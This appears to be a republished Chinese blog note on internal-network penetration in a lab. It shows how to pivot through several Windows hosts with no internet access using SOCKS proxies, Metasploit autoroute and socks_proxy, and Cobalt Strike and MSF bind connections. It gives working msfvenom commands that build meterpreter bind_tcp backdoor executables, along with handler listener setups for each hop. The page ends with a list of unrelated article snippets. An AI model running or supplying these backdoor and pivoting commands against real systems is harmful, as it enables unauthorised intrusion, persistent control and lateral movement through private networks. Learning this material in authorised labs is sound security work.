内网安全-代理Socks协议路由不出网后渗透通讯CS-MSF控制上线简单总结

我这里只记录原理,具体操作看文章后半段或者这篇文章内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线_内网渗透 代理-CSDN博客

注意这里是解决后渗透通讯问题,之后怎么提权,控制后面再说

背景

只有win7有网,其他没网

网络情况:win7有其他都没有

巧合地是:几台设备入栈规则不严格

代理协议:


SOCKS4/5


代理软件:


SocksCap Proxifier ProxyChains


实现两个目的:


1、通讯后的渗透测试横向移动
2、通讯后的控制上线CS&MSF

win7当作跳板机,端口转发攻击机的流量

win7上线

win7上线省略

VPS建立节点通信win10

MSF需要添加路由转发,CS不需要

添加路由只是MSF可以与WIN10通信,别的渗透工具不可以。所以还需要建立节点,使得渗透工具可以通信  建立节点的目的是接收数据,而前面的路由的目的是建立通讯

节点是在攻击者vps上建立的(准确点是在MSF中建立的节点,而MSF是控制win7的=相当于节点部署在win7上(这里可能理解不正确,暂时认为节点部署在了vps上)),开启vps端口接收数据,然后通过vps上的MSF控制器的路由去渗透内网主机

攻击者通过链接自己的vps进行操作

关键是建立节点

节点建立好之后,攻击者可以使用代理工具访问该节点,通过该节点访问内网主机

win10上线

到这里可以访问win10,然后如果我们拿到了win10的CMD权限,要控制他需要使用CS&MSF。但是win10不出网,而我们此时控制了win7,所以让win7去访问win10

我们需要正向链接,生成本地后门,执行后的权限把数据交给本地2222端口。win7控制器链接当前win10的2222。win7和CS通信,至此可以访问win10

bind_tcp 没有host,因为直接给的本地

(反向后门

后门执行完交给控制器的2222,控制器再监听自己本地的2222)

CS上线win10

使用win10的CMD权限(之前假设取得了此权限,怎么取得的呢?你信息搜集提权等操作取得的)执行后门,并不会上线

需要在win7的会话中访问win10 connect 192.168.11.129 2222即可上线

用192.168.11.128(win7)去控制192.168.11.129(win10)

MSF上线win10

正向链接

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2003.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129   ##目标地址
set lport 3333
run

session会话

VPS建立节点通信win2008

win10建立节点链接win2008

CS建立节点

攻击者本地使用代理工具链接该地址192.168.22.131

MSF建立节点

选择会话2

建立路由

run autoroute -p
run post/multi/manage/autoroute
 

节点要和上面的节点的端口号不要相同

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 2233
run

 攻击者本地使用代理工具链接该地址192.168.22.131

win2008上线

CS上线

创建新的监听器 设置一个正向连接,如果使用反向连接,木马上线后,由于无法和攻击机连接,所以就会导致上线失败,而这里使用正向连接,

生成3331的后门

将生成的木马放在win2008,运行木马。此时还是不会上线,和win10上线一样。

通过win10访问192.168.22.131 3331

MSF上线

生成正向链接木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2008.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.22.131   ##目标地址
set lport 3333
run

win2012上线

CS上线

cs建立节点

然后探测资产信息,提权,正向链接

上线

建立监听,正向链接

生成后门,将后门放入win2012,执行后门

需要在win2008的会话中访问win2012 connect 192.168.33.130 4444即可上线

MSF上线

以下操作同上,所以直接复制上面的图片下来了

MSF建立节点

选择会话3

建立路由

run autoroute -p
run post/multi/manage/autoroute

 节点要和上面的节点的端口号不要相同

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 3344
run

 攻击者本地使用代理工具链接该地址192.168.33.130

上线

生成正向链接木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > 2012.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.129   ##目标地址
set lport 4444
run

入栈严格怎么办?

反向链接:

总结

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/323706.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

对XYctf的一些总结

对XYctf的一些总结 WEB 1.http请求头字段 此次比赛中出现的: X-Forwarded-For/Client-ip:修改来源ip via:修改代理服务器 还有一些常见的字段: GET:此方法用于请求指定的资源。GET请求应该安全且幂等&#xff0c…

C++ 如何进阶?

一、C基础(3个月) 1、面向对象的三大特性:封装、继承、多态 2、类的访问权限:private、protected、public 3、类的构造函数、析构函数、赋值函数、拷贝函数 4、移动构造函数与接贝构造函数对比 5、深接贝与浅贝的区别 6、空…

超标量处理器设计:重排序缓存(ROB)

★超标量处理器的很多地方用到了重排序缓存,但是我对它不是很了解,所以我整理一下重排序缓存的知识点。 重排序缓存(ROB)在确保乱序执行的指令能够正确地完成和提交(Commit),也可以用来寄存器重命名。 ROB是一个先进先出的表,每个…

教你解决PUBG绝地求生游戏中闪退掉线无法重连回去的问题

《绝地求生》(PUBG),作为一款在全球范围内掀起热潮的战术竞技游戏,以其栩栩如生的战场环境和令人心跳加速的生存冒险博得了广大玩家的青睐。然而,一些玩家在经历了一场惊心动魄的对局后,却面临了一个不大不…

uniapp video 层级覆盖

层级覆盖 cover-view组件 我这里做了个判断 监听全屏时隐藏按钮 根据项目需求自行更改

汉诺塔问题和爬楼梯(递归)

感谢大佬的光临各位,希望和大家一起进步,望得到你的三连,互三支持,一起进步 个人主页:LaNzikinh-CSDN博客 c语言基础_LaNzikinh篮子的博客-CSDN博客 文章目录 一.爬楼梯问题二.汉诺塔问题总结 一.爬楼梯问题 假设你正…

第八篇:深入探索操作系统架构:从基础到前沿

深入探索操作系统架构:从基础到前沿 1 引言 在当今这个高速发展的数字时代,操作系统无疑是计算机科学领域的基石之一。它不仅是计算机硬件与最终用户之间的桥梁,更是实现高效计算和资源管理的关键。操作系统的架构,即其内部结构和…

AIGC 时代软件工程师:前景、需求与大模型提效探究

过去,在互联网浪潮汹涌的十年来,软件工程师的角色愈发凸显其不可或缺的价值。随着AIGC(人工智能生成内容)时代的到来,软件开发的每个环节都正在经历一场前所未有的革新。今天,我们深入研究了大型AI模型如何…

ETL中如何执行Python脚本

Python的解读 Python 是一种高级、通用的编程语言,由荷兰程序员吉多范罗苏姆(Guido van Rossum)于1990年代初设计并发布。Python的设计哲学强调代码的可读性和简洁性,它的语法清晰且表达力强,使得开发者能够以更少的代…

【二分查找 滑动窗口】100257找出唯一性数组的中位数

本文涉及知识点 二分查找算法合集 C算法:滑动窗口总结 LeetCode 100257找出唯一性数组的中位数 给你一个整数数组 nums 。数组 nums 的 唯一性数组 是一个按元素从小到大排序的数组,包含了 nums 的所有非空子数组中不同元素的个数。 换句话说&#xf…

QAnything 在mac M2 上纯python环境安装使用体验(避坑指南)

这是一篇mac m2本地纯python环境安装 qanything的文章。安装并不顺利,官方提供的模型无法在本地跑。 这篇文章记录了,使用xinference来部署本地模型,并利用openAi的通用接口的方式,可以正常使用。 记录了遇到的所有的问题&#xf…

安全数据交换系统哪个好?该如何选型?

安全数据交换系统是用于在不同网络或组织之间安全、高效地传输和共享数据的解决方案。安全数据交换系统对于任何需要处理敏感数据、确保数据安全、并满足合规要求的组织来说都是至关重要的。 这种系统通常用于以下目的: 1)数据传输:允许用户…

Docker快速搭建NAS服务——NextCloud

Docker快速搭建NAS服务——NextCloud 文章目录 前言NextCloud的搭建docker-compose文件编写运行及访问 总结 前言 本文主要讲解如何使用docker在本地快速搭建NAS服务,这里主要写如下两种: FileBrowser1:是一个开源的Web文件管理器&#xff…

从0到1:低代码如何助力社会组织实现管理数字化

在数字化大时代,创业服务中心的数字化转型显得至关重要。数字化转型不仅是一个技术升级的过程,更是一个涉及业务模式、组织结构、服务方式等全方位的深刻变革。 随着信息技术的快速发展,数字化已经渗透到社会生活的各个领域,成为…

Docker笔记(七)使用Docker部署Spring Boot项目

本文介绍如何使用Docker打包并部署Spring Boot多模块项目。 其中本文涉及的Docker的私库是用Nexus3搭建的。 使用Docker部署Spring Boot项目有三种方式 (1)使用 spring-boot-maven-plugin内置的build-image. (2)使用 Google 的 j…

发票审核如何自查?报销没有发票,如何处理?

在财务管理中,发票是非常重要的一项凭证,是费用核算和税务申报的重要依据,但光靠发票入账可能会被定义为虚开。 一、费用报销审核必看的6个要点 1、票据与实际业务吻合 这是费用报销中最基本的常识,比如:采购一批物料&…

三、配置带HybridCLR的ARCore开发环境

预告 本专栏将介绍如何使用这个支持热更的AR开发插件,快速地开发AR应用。 专栏: Unity开发AR系列 插件简介 通过热更技术实现动态地加载AR场景,简化了AR开发流程,让用户可更多地关注Unity场景内容的制作。 “EnvInstaller…”支…

新能源汽车中HEV与PHEV分别代表什么车型,它们与传统燃油车都有什么区别?

前言 新能源汽车正逐渐成为全球汽车工业的主流方向,而HEV(Hybrid Electric Vehicle)和PHEV(Plug-in Hybrid Electric Vehicle)这两种混合动力车型在这一转型过程中扮演着重要角色。下面我们详细探讨HEV与PHEV的定义&a…

Pandas数据取值与选择

文章目录 第1关:Series数据选择第2关:DataFrame数据选择方法 第1关:Series数据选择 编程要求 本关的编程任务是补全右侧上部代码编辑区内的相应代码,要求实现如下功能: 添加一行数据,时间戳2019-01-29值为…

TC3xx MTU概述(2)

目录 1.概述 2.如何配置NDT 3.小结 1.概述 上篇TC3xx MTU概述(1)-CSDN博客我们讲解了MTU基本功能和MBIST基本概念,接下来我们继续讲解MTU如何配置NDT算法。 2.如何配置NDT 前面聊了那么多概念,我们还是来看看如何配置MTU来实现NDT。 MTU寄存器分为…